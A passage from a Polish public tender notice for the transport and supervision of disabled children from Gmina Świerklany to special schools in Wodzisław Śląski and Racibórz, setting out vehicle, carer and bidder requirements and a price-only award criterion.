stwierdzenia sytuacji zagrażającej dzieciom nakazuje się natychmiastowe poinformowanie o tym fakcie Zamawiającego i Wykonawcę,<br/>	opiekun jest zobowiązany do odprowadzenia podopiecznych do drzwi budynku placówki oświatowej podczas przywozu, a podczas odbioru do odebrania spod drzwi budynku placówki oświatowej. Nie dopuszcza się przekazywania dzieci w drodze powrotnej ze szkoły do domu osobom nieupoważnionym.<br/>e)	Wykonawca ponosi pełną odpowiedzialność za zapewnienie bezpiecznych i higienicznych warunków transportu dzieci i ich opiekuna oraz zobowiązuje się do ubezpieczenia pasażerów od następstw nieszczęśliwych wypadków i poniesienia związanych z tym kosztów.<br/>f)	w razie awarii pojazdu Wykonawca winien zapewnić pojazd zastępczy spełniający wymagania określone w pkt. 4.2.4.<br/>4.2.6.	Przewidywana liczba kilometrów trasy przewozu dzieci:<br/>a)	łączna trasa dzienna przejazdu pojazdu będzie wynosiła średnio ok. 50 km.<br/>b)	planowana liczba dni wykonywania usługi w okresie od 2 września 2024 r. do 27 czerwca 2025 r. wyniesie 199 dni. <br/>c)	łączna liczba kilometrów w okresie od 2 września 2024 r. do 27 czerwca 2025 r. wyniesie ok. 9.950 km.<br/>4.2.7.	Sposób realizacji usługi:<br/>a)	Zamawiający wymaga by przewóz dzieci był realizowany przez Wykonawcę, który posiada licencję na wykonywanie krajowego transportu drogowego osób, wydaną na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym. W przypadku gdy ofertę złożą podmioty wspólnie ubiegające się o udzielenie zamówienia, ww. licencją winien legitymować się ten członek konsorcjum, który świadczył będzie usługę transportową.<br/>b)	transport dzieci może odbywać się tylko z opiekunem, którego zapewnia Wykonawca.<br/>4.2.8.	Cena przedmiotu zamówienia:<br/>a)	oferowana cena za 1 dzień przewozu obejmować winna transport dzieci, postój, pomoc w wejściu i wyjściu z pojazdu.<br/>b)	za wykonane usługi przewozowe wybrany Wykonawca otrzyma wynagrodzenie obliczone wg wzoru: <br/>liczba dni przewozu x cena za 1 dzień przewozu netto +8% VAT </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">23.1.	Zamawiający dokona oceny ofert, które nie podlegają odrzuceniu na podstawie art. 226 ust. 1 Pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.3.	W części 3 przedmiotem zamówienia jest świadczenie usługi w zakresie transportu i opieki podczas przewozu niepełnosprawnych dzieci z terenu Gminy Świerklany do placówek oświatowych w Wodzisławiu Śląskim i z powrotem do najbliższego miejscu zamieszkania dziecka przystanku, organizowany w dni zajęć dydaktyczno-wychowawczych w roku szkolnym 2024/2025 dla 2 uczniów.<br/><br/>4.3.1.	Szkoły/przedszkola, do których dowożone będą dzieci:<br/>a)	Niepubliczny Ośrodek Rewalidacyno-Wychowawczy RAFA, ul. 1 Maja23b, Wodzisław Śląski<br/>4.3.2.	Przystanki:<br/>Przystanki zlokalizowane będą w miarę możliwości najbliżej miejsca zamieszkania dziecka. Dokładne rozmieszczenie przystanków, jak również trasy i godziny odjazdów samochodów dowożących dzieci zostaną uzgodnione z wybranym Wykonawcą po podpisaniu Umowy i po sporządzeniu planów zajęć w poszczególnych placówkach oświatowych. <br/>Orientacyjna trasa:<br/>ul. Rajska, Świerklany<br/>ul. 1 Maja 23b, Wodzisław Śląski (Niepubliczny Ośrodek Rewalidacyjno-Wychowawczy RAFA)<br/>4.3.3.	Termin i czas realizacji usługi:<br/>a)	usługa będzie wykonywana w dni zajęć dydaktyczno-wychowawczych w okresie od 3 września 2024 r. do 27 czerwca 2025 r. <br/>b)	transport dzieci do placówek oświatowych określonych w pkt. 4.3.1. winien odbywać się w godzinach od 6,oo do 9,oo, zgodnie z harmonogramem ustalonym przez Wykonawcę z osobą odpowiedzialną ustanowioną przez Zamawiającego. Dzieci powinny być dowiezione do szkoły/przedszkola w takim czasie, aby mogły punktualnie rozpocząć zajęcia lekcyjne zgodnie z obowiązującym je szkolnym planem lekcji/zajęciami w przedszkolu.<br/>c)	transport dzieci z wyznaczonych placówek oświatowych do przystanków, określonych w pkt. 4.3.2. winien odbywać się w godzinach od 14,oo do 17,oo, zgodnie z harmonogramem ustalonym przez Wykonawcę z osobą odpowiedzialną ustanowioną przez Zamawiającego.<br/>4.3.4.	Wymagania wobec pojazdu, którym wykonywana będzie usługa:<br/>a)	Wykonawca składający ofertę musi wykazać, że w celu realizacji zamówienia będzie dysponował co najmniej jednym pojazdem z liczbą miejsc:<br/>	osoby na wózkach inwalidzkich	0<br/>	osoby niepełnosprawne 2<br/>	opiekun<br/>	kierowca<br/>b)	siedzenia dla dzieci winny być wyposażone w bezwładnościowe pasy bezpieczeństwa. <br/>4.3.5.	Obowiązki Wykonawcy:<br/>a)	pojazdy używane do transportu dzieci niepełnosprawnych muszą być przystosowane do przewozu dzieci niepełnosprawnych zgodnie z przepisami ustawy z dnia 6 września 2001 r. o transporcie drogowym, ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym oraz przepisami wykonawczymi do ustaw.<br/>b)	Wykonawca jest zobowiązany do wyposażenia pojazdu w środki łączności – telefon komórkowy.<br/>c)	Wykonawca winien dysponować kierowcami posiadającymi odpowiednie kwalifikacje zawodowe. Przed rozpoczęciem wykonywania przewozów Wykonawca poda Zamawiającemu dane osobowe kierowców w zakresie niezbędnym do weryfikacji kierowców w Rejestrze Sprawców Przestępstw na Tle Seksualnym prowadzonym przez Ministra Sprawiedliwości.<br/>d)	Wymaga się by przewóz dzieci był realizowany pod opieką opiekuna, który nie może być jednocześnie kierowcą. <br/>Wymagania wobec opiekuna zatrudnionego w dowozie przez Wykonawcę: opiekunem winna być osoba dorosła, sprawna fizycznie, przeszkolona z zakresu udzielania pierwszej pomocy przedmedycznej, nie figurująca w Rejestrze Sprawców Przestępstw na Tle Seksualnym prowadzonym przez Ministra Sprawiedliwości oraz dająca rękojmię bezpiecznego i komfortowego dojazdu dzieci do szkół i przedszkoli. <br/>Wykonawca musi dysponować tyloma różnymi opiekunami, na ile części składa ofertę.<br/>Obowiązki opiekuna:<br/>	opiekun jest odpowiedzialny za bezpieczeństwo uczniów w trakcie wsiadania i wysiadania ze środka transportu oraz w trakcie przejazdu,<br/>	w trakcie wykonywania czynności ściśle współpracuje z kierowcą pojazdu,<br/>	w trakcie wsiadania/wysiadania uczniów, po zatrzymaniu pojazdu, otwiera drzwi i wychodzi na zewnątrz i sprawdza, czy w miejscu wsiadania nie występują jakiekolwiek zagrożenia, jeśli nie występują zagrożenia zezwala na wejście/wyjście z pojazdu,<br/>	w trakcie przewozu opiekun na bieżąco kontroluje ład i bezpieczeństwo w pojeździe, podejmując skuteczną interwencję w razie jego naruszenia (bez użycia siły fizycznej i przemocy psychicznej). W przypadku stwierdzenia sytuacji zagrażającej dzieciom nakazuje się natychmiastowe poinformowanie o tym fakcie Zamawiającego i Wykonawcę,<br/>	opiekun jest zobowiązany do odprowadzenia podopiecznych do drzwi budynku placówki oświatowej podczas przywozu, a podczas odbioru do odebrania spod drzwi budynku placówki oświatowej. Nie dopuszcza się przekazywania dzieci w drodze powrotnej ze szkoły do domu osobom nieupoważnionym.<br/>e)	Wykonawca ponosi pełną odpowiedzialność za zapewnienie bezpiecznych i higienicznych warunków transportu dzieci i ich opiekuna oraz zobowiązuje się do ubezpieczenia pasażerów od następstw nieszczęśliwych wypadków i poniesienia związanych z tym kosztów.<br/>f)	w razie awarii pojazdu Wykonawca winien zapewnić pojazd zastępczy spełniający wymagania określone w pkt. 4.3.4.<br/>4.3.6.	Przewidywana liczba kilometrów trasy przewozu dzieci:<br/>a)	łączna trasa dzienna przejazdu pojazdu będzie wynosiła średnio ok. 27 km.<br/>b)	planowana liczba dni wykonywania usługi, w okresie od 3 września 2024 r. do 27 czerwca 2025 r. wyniesie 188 dni. <br/>c)	łączna liczba kilometrów w okresie od 3 września 2024 r. do 27 czerwca 2025 r. wyniesie ok. 5.076 km.<br/>4.3.7.	Sposób realizacji usługi:<br/>a)	Zamawiający wymaga by przewóz dzieci był realizowany przez Wykonawcę, który posiada licencję na wykonywanie krajowego transportu drogowego osób, wydaną na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym. W przypadku gdy ofertę złożą podmioty wspólnie ubiegające się o udzielenie zamówienia, ww. licencją winien legitymować się ten członek konsorcjum, który świadczył będzie usługę transportową.<br/>b)	transport dzieci może odbywać się tylko z opiekunem, którego zapewnia Wykonawca.<br/><br/>4.3.8.	Cena przedmiotu zamówienia:<br/>a)	oferowana cena za 1 dzień przewozu obejmować winna transport dzieci, postój, pomoc w wejściu i wyjściu z pojazdu.<br/>b)	za wykonane usługi przewozowe wybrany Wykonawca otrzyma wynagrodzenie obliczone wg wzoru: <br/>liczba dni przewozu x cena za 1 dzień przewozu netto +8% VAT </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-03 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">23.1.	Zamawiający dokona oceny ofert, które nie podlegają odrzuceniu na podstawie art. 226 ust. 1 Pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.4.	W części 4 przedmiotem zamówienia jest świadczenie usługi w zakresie transportu i opieki podczas przewozu niepełnosprawnych dzieci z terenu Gminy Świerklany do placówek oświatowych w Raciborzu i z powrotem do najbliższego miejscu zamieszkania dziecka przystanku, organizowany w dni zajęć dydaktyczno-wychowawczych w roku szkolnym 2024/2025 dla 2 uczniów.<br/><br/>4.4.1.	Szkoły/przedszkola, do których dowożone będą dzieci:<br/>a)	Specjalny Ośrodek Szkolno - Wychowawczy dla Niesłyszących i Słabosłyszących, ul. Karola Miarki 4, 47-400 Racibórz<br/>4.4.2.	Przystanki:<br/>Przystanki zlokalizowane będą w miarę możliwości najbliżej miejsca zamieszkania dziecka. Dokładne rozmieszczenie przystanków, jak również trasy i godziny odjazdów samochodów dowożących dzieci zostaną uzgodnione z wybranym Wykonawcą po podpisaniu Umowy i po sporządzeniu planów zajęć w poszczególnych placówkach oświatowych. <br/>Orientacyjna trasa:<br/>ul. Rybnicka, Świerklany<br/>ul. Karola Miarki 4, Racibórz (SOSWNiS)<br/>4.4.3.	Termin i czas realizacji usługi:<br/>a)	usługa będzie wykonywana w dni zajęć dydaktyczno-wychowawczych w okresie od 3 września 2024 r. do 27 czerwca 2025 r. <br/>b)	transport dzieci do placówek oświatowych określonych w pkt. 4.3.1. winien odbywać się w godzinach od 6,oo do 9,oo, zgodnie z harmonogramem ustalonym przez Wykonawcę z osobą odpowiedzialną ustanowioną przez Zamawiającego. Dzieci powinny być dowiezione do szkoły/przedszkola w takim czasie, aby mogły punktualnie rozpocząć zajęcia lekcyjne zgodnie z obowiązującym je szkolnym planem lekcji/zajęciami w przedszkolu.<br/>c)	transport dzieci z wyznaczonych placówek oświatowych do przystanków, określonych w pkt. 4.3.2. winien odbywać się w godzinach od 14,oo do 17,oo, zgodnie z harmonogramem ustalonym przez Wykonawcę z osobą odpowiedzialną ustanowioną przez Zamawiającego.<br/>4.4.4.	Wymagania wobec pojazdu, którym wykonywana będzie usługa:<br/>a)	Wykonawca składający ofertę musi wykazać, że w celu realizacji zamówienia będzie dysponował co najmniej jednym pojazdem z liczbą miejsc:<br/>	osoby na wózkach inwalidzkich	0<br/>	osoby niepełnosprawne 2<br/>	opiekun<br/>	kierowca<br/>b)	siedzenia dla dzieci winny być wyposażone w bezwładnościowe pasy bezpieczeństwa. <br/>4.4.5.	Obowiązki Wykonawcy:<br/>a)	pojazdy używane do transportu dzieci niepełnosprawnych muszą być przystosowane do przewozu dzieci niepełnosprawnych zgodnie z przepisami ustawy z dnia 6 września 2001 r. o transporcie drogowym, ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym oraz przepisami wykonawczymi do ustaw.<br/>b)	Wykonawca jest zobowiązany do wyposażenia pojazdu w środki łączności – telefon komórkowy.<br/>c)	Wykonawca winien dysponować kierowcami posiadającymi odpowiednie kwalifikacje zawodowe. Przed rozpoczęciem wykonywania przewozów Wykonawca poda Zamawiającemu dane osobowe kierowców w zakresie niezbędnym do weryfikacji kierowców w Rejestrze Sprawców Przestępstw na Tle Seksualnym prowadzonym przez Ministra Sprawiedliwości.<br/>d)	Wymaga się by przewóz dzieci był realizowany pod opieką opiekuna, który nie może być jednocześnie kierowcą. <br/>Wymagania wobec opiekuna zatrudnionego w dowozie przez Wykonawcę: opiekunem winna być osoba dorosła, sprawna fizycznie, przeszkolona z zakresu udzielania pierwszej pomocy przedmedycznej, nie figurująca w Rejestrze Sprawców Przestępstw na Tle Seksualnym prowadzonym przez Ministra Sprawiedliwości oraz dająca rękojmię bezpiecznego i komfortowego dojazdu dzieci do szkół i przedszkoli. <br/>Wykonawca musi dysponować tyloma różnymi opiekunami, na ile części składa ofertę.<br/>Obowiązki opiekuna:<br/>	opiekun jest odpowiedzialny za bezpieczeństwo uczniów w trakcie wsiadania i wysiadania ze środka transportu oraz w trakcie przejazdu,<br/>	w trakcie wykonywania czynności ściśle współpracuje z kierowcą pojazdu,<br/>	w trakcie wsiadania/wysiadania uczniów, po zatrzymaniu pojazdu, otwiera drzwi i wychodzi na zewnątrz i sprawdza, czy w miejscu wsiadania nie występują jakiekolwiek zagrożenia, jeśli nie występują zagrożenia zezwala na wejście/wyjście z pojazdu,<br/>	w trakcie przewozu opiekun na bieżąco kontroluje ład i bezpieczeństwo w pojeździe, podejmując skuteczną interwencję w razie jego naruszenia (bez użycia siły fizycznej i przemocy psychicznej). W przypadku stwierdzenia sytuacji zagrażającej dzieciom nakazuje się natychmiastowe poinformowanie o tym fakcie Zamawiającego i Wykonawcę,<br/>	opiekun jest zobowiązany do odprowadzenia podopiecznych do drzwi budynku placówki oświatowej podczas przywozu, a podczas odbioru do odebrania spod drzwi budynku placówki oświatowej. Nie dopuszcza się przekazywania dzieci w drodze powrotnej ze szkoły do domu osobom nieupoważnionym.<br/>e)	Wykonawca ponosi pełną odpowiedzialność za zapewnienie bezpiecznych i higienicznych warunków transportu dzieci i ich opiekuna oraz zobowiązuje się do ubezpieczenia pasażerów od następstw nieszczęśliwych wypadków i poniesienia związanych z tym kosztów.<br/>f)	w razie awarii pojazdu Wykonawca winien zapewnić pojazd zastępczy spełniający wymagania określone w pkt. 4.3.4.<br/>4.4.6.	Przewidywana liczba kilometrów trasy przewozu dzieci:<br/>a)	łączna trasa dzienna przejazdu pojazdu będzie wynosiła średnio ok. 60 km.<br/>b)	planowana liczba dni wykonywania usługi, w okresie od 3 września 2024 r. do 27 czerwca 2025 r. wyniesie 188 dni. <br/>c)	łączna liczba kilometrów w okresie od 3 września 2024 r. do 27 czerwca 2025 r. wyniesie ok. 11.280 km.<br/>4.4.7.	Sposób realizacji usługi:<br/>a)	Zamawiający wymaga by przewóz dzieci był realizowany przez Wykonawcę, który posiada licencję na wykonywanie krajowego transportu drogowego osób, wydaną na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym. W przypadku gdy ofertę złożą podmioty wspólnie ubiegające się o udzielenie zamówienia, ww. licencją winien legitymować się ten członek konsorcjum, który świadczył będzie usługę transportową.<br/>b)	transport dzieci może odbywać się tylko z opiekunem, którego zapewnia Wykonawca.<br/>4.4.8.	Cena przedmiotu zamówienia:<br/>a)	oferowana cena za 1 dzień przewozu obejmować winna transport dzieci, postój, pomoc w wejściu i wyjściu z pojazdu.<br/>b)	za wykonane usługi przewozowe wybrany Wykonawca otrzyma wynagrodzenie obliczone wg wzoru: <br/>liczba dni przewozu x cena za 1 dzień przewozu netto +8% VAT </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-03 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">23.1.	Zamawiający dokona oceny ofert, które nie podlegają odrzuceniu na podstawie art. 226 ust. 1 Pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy w dniu składania ofert oraz przez czasokres do dnia zawarcia umowy:<br/>6.1.1.	nie podlegają wykluczeniu na zasadach określonych w pkt. 7 SWZ,<br/>6.1.2.	spełniają warunki udziału w postępowaniu dotyczące:<br/>a)	uprawnień do prowadzenia działalności zawodowej:<br/>Za minimalny poziom zdolności uznane zostanie, że Wykonawca posiada licencję na wykonywanie krajowego transportu drogowego osób, wydaną na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym<br/>Uwaga:<br/>W przypadku gdy ofertę złożą podmioty wspólnie ubiegające się o udzielenie zamówienia, ww. licencją winien legitymować się ten członek konsorcjum, który świadczył będzie usługę transportową.<br/>b)	zdolności technicznej:<br/>	Za minimalny poziom zdolności uznane zostanie, że Wykonawca:<br/>	dysponuje osobami przeszkolonymi z zakresu udzielania pierwszej pomocy przedmedycznej, tj.:<br/>1)	dla części 1: co najmniej 1 osobą w pojeździe<br/>2)	dla części 2: co najmniej 1 osobą w pojeździe<br/>3)	dla części 3: co najmniej 1 osobą w pojeździe<br/>4)	dla części 4: co najmniej 1 osobą w pojeździe<br/>Uwaga:<br/>1)	W przypadku składania oferty na więcej niż jedną część Wykonawca będzie zobowiązany do wykazania dysponowania osobami dla każdej części odrębnie.<br/>	Powyższe oznacza, iż wskazane osoby nie mogą się powtarzać. W przypadku gdyby dana osoba została wskazana w więcej niż jednej części, będzie ona brana pod uwagę w pierwszej z części, w której została wskazana. W przypadku niewykazania spełniania warunku w danej części Wykonawca zostanie wykluczony z tej części. <br/>2)	Zamawiający wymaga podania danych osobowych opiekuna w zakresie umożliwiającym jego weryfikację w Rejestrze Sprawców Przestępstw na Tle Seksualnym prowadzonym przez Ministra Sprawiedliwości.<br/>3)	Potwierdzenie powyższego nastąpi w Wykazie osób (opiekunów) skierowanych przez Wykonawcę do realizacji zamówienia publicznego (Załączniku nr 6 do SWZ) w celu potwierdzenia spełniania warunku udziału w postępowaniu.<br/>	dysponuje co najmniej jednym pojazdem dostosowanym do przewozu:<br/>1)	dla części 1 (pierwsza trasa):	Świerklany – Rybnik<br/>	osoby na wózkach inwalidzkich	2<br/>	osoby niepełnosprawne 12<br/>	opiekun<br/>	kierowca<br/>Pojazd/y musi być wyposażony w podnośnik lub rampę najazdową <br/>2)	dla części 2 (druga trasa):	Świerklany – Żory<br/>	osoby na wózkach inwalidzkich	2<br/>	osoby niepełnosprawne 5<br/>	opiekun<br/>	kierowca<br/>Pojazd/y musi być wyposażony w podnośnik lub rampę najazdową <br/>3)	dla części 3 (trzecia trasa):	Świerklany–Wodzisław Śląski <br/>	osoby na wózkach inwalidzkich	0 <br/>	osoby niepełnosprawne 2<br/>	opiekun<br/>	kierowca<br/>4)	dla części 4 (czwarta trasa):	Świerklany–Racibórz <br/>	osoby na wózkach inwalidzkich	0 <br/>	osoby niepełnosprawne 2<br/>	opiekun<br/>	kierowca<br/><br/>Uwaga:<br/>1)	W przypadku składania oferty na więcej niż jedną część Wykonawca będzie zobowiązany do wykazania dysponowania pojazdami dla każdej części odrębnie. Oznacza to, że pojazdy nie mogą się powtarzać. W przypadku gdyby dany pojazd został wskazany w więcej niż jednej części będzie on brany pod uwagę w pierwszej z części, w której został wskazany. W przypadku niewykazania spełniania warunku w danej części Wykonawca zostanie wykluczony z tej części.<br/>2)	Potwierdzenie powyższego nastąpi w Wykazie pojazdów dostępnych Wykonawcy w celu wykonania zamówienia publicznego (Załączniku nr 7 do SWZ) w celu potwierdzenia spełniania warunku udziału w postępowaniu.<br/>6.2.	Poleganie na zasobach innych podmiotów, zgodnie z Odziałem 3 Pzp:<br/>6.2.1.	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt. 6.1.2. lit. b) SWZ w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolności technicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.<br/>6.2.2.	Wykonawca, który polega na zdolności technicznej podmiotów udostępniających zasoby, składa wraz z ofertą:<br/>a)	zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji niniejszego zamówienia (Załącznik nr 4 i 5 do SWZ) lub inny środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów,<br/>b)	odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 Pzp jest umocowana do jego reprezentowania.<br/>6.2.3.	Zamawiający oceni, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności technicznej pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w pkt. 6.1.2. lit. b), a także zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem Wykonawcy (pkt 7 SWZ).<br/>6.2.4.	Jeżeli zdolności techniczne podmiotu udostępniającego nie potwierdzą spełniania przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający zażąda, aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>6.2.5.	Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach podmiotów udostępniających zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">9.1.	Zgodnie z art. 274 ust. 1 Pzp Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących, aktualnych na dzień ich złożenia, podmiotowych środków dowodowych:<br/>9.1.1.	licencji na wykonywanie krajowego drogowego osób wydanej na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym.<br/>9.1.2.	wykazu osób (opiekunów) skierowanych przez Wykonawcę do realizacji zamówienia publicznego (Załącznik nr 6 do SWZ).<br/>9.1.3.	wykazu pojazdów dostępnych Wykonawcy w celu wykonania zamówienia publicznego (załącznik nr 7 do SWZ).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 16.2.	W terminie składania ofert określonym w pkt. 19.1. Wykonawca zobowiązany jest złożyć Zamawiającemu Ofertę zawierającą:<br/>16.2.1.	Formularz Oferty (wg załącznika nr 1 do SWZ)<br/>16.2.2.	odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy, Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia, podmiotu udostępniającego zasoby, jest umocowana do jego reprezentowania.<br/>16.2.3.	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, o ile prawo osoby podpisującej ofertę do reprezentowania Wykonawcy nie wynika wprost z odpisu właściwego rejestru, ewidencji lub statutu (jeśli dotyczy)<br/>16.2.4.	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenia zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo (jeśli dotyczy). Pełnomocnik może być umocowany do reprezentowania Wykonawców w postępowaniu albo reprezentowania w postępowaniu i zawarcia Umowy<br/>16.2.5.	oświadczenie z art. 117 ust. 4 Pzp (wg załącznika nr 2 do SWZ) (jeśli dotyczy)<br/>16.2.6.	oświadczenie na podstawie art. 125 ust. 1 Pzp (wg załącznika nr 3 do SWZ)<br/>16.2.7.	oświadczenie na podstawie art. 125 ust. 5 Pzp (wg załącznika nr 3a do SWZ) (jeśli dotyczy)<br/>16.2.8.	zobowiązanie podmiotu udostępniającego zasoby w trybie art. 118 ust. 3 Pzp służące wykazaniu udostępnienia Wykonawcy zdolności technicznej w zakresie osób (opiekunów) (wg załącznika nr 4 do SWZ) (jeśli dotyczy)<br/>16.2.9.	zobowiązanie podmiotu trzeciego w trybie art. 118 ust. 3 Pzp służące wykazaniu udostępnienia Wykonawcy zdolności technicznej w zakresie pojazdów (wg załącznika nr 5 do SWZ) (jeśli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: 